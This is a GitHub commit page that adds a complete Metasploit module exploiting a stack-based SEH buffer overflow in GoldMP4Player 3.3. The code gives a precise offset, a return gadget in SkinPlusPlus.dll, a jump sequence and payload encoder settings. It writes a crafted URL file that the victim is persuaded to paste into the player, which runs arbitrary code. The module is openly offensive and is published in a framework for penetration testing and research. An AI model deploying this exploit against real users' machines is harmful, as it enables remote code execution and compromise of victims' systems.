Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Browse files

Land #5008 into unstable

  • Loading branch information...
commit cae6931015c38536cd461c18f8cbfda91645de00 2 parents 48a1ff9 + cd7bf45
@jvazquez-r7 jvazquez-r7 authored
View
90 unstable-modules/exploits/unreliable/windows/fileformat/goldmp4player_url_bof.rb
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'GoldMP4Player URL Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability in
+ GoldMP4Player 3.3, caused by improper bounds checking of a URL.
+ By persuading the victim to copy the specially-crafted URL from the
+ resulting file and paste it into the Open Flash URL window, a remote
+ attacker could execute arbitrary code on the system or cause the
+ application to crash. This module has been tested successfully on
+ Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gabor Seljan' # Vulnerability discovery and Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'BID', '65855' ],
+ [ 'EDB', '31914' ],
+ [ 'EDB', '31972' ],
+ [ 'OSVDB', '103826' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => 'process',
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => ((0..0xff).to_a - (0x21..0x7e).to_a).pack("C*"),
+ 'Space' => 6400,
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x59\x59\x59\x59\x5C\x61\x59\x59\x59\x59\x59\x41\x41\x41\x41",
+ 'EncoderOptions' =>
+ {
+ 'BufferRegister' => 'ESP'
+ },
+ },
+ 'Targets' =>
+ [
+ [ 'Windows XP SP3 / Windows 7 SP1',
+ {
+ 'Offset' => 253,
+ 'Ret' => 0x10104544 # POP EBP # POP EBX # RETN [SkinPlusPlus.dll]
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Feb 27 2014',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt'])
+ ],
+ self.class)
+
+ end
+
+ def exploit
+
+ sploit = rand_text_alpha(target['Offset'])
+ sploit << "\x4b\x4b\x77\x21"
+ sploit << [target.ret].pack('V')
+ sploit << rand_text_alpha(29)
+ sploit << payload.encoded
+
+ # Create the file
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create("http://#{sploit}.swf")
+
+ end
+end
+
Please sign in to comment.
Something went wrong with that request. Please try again.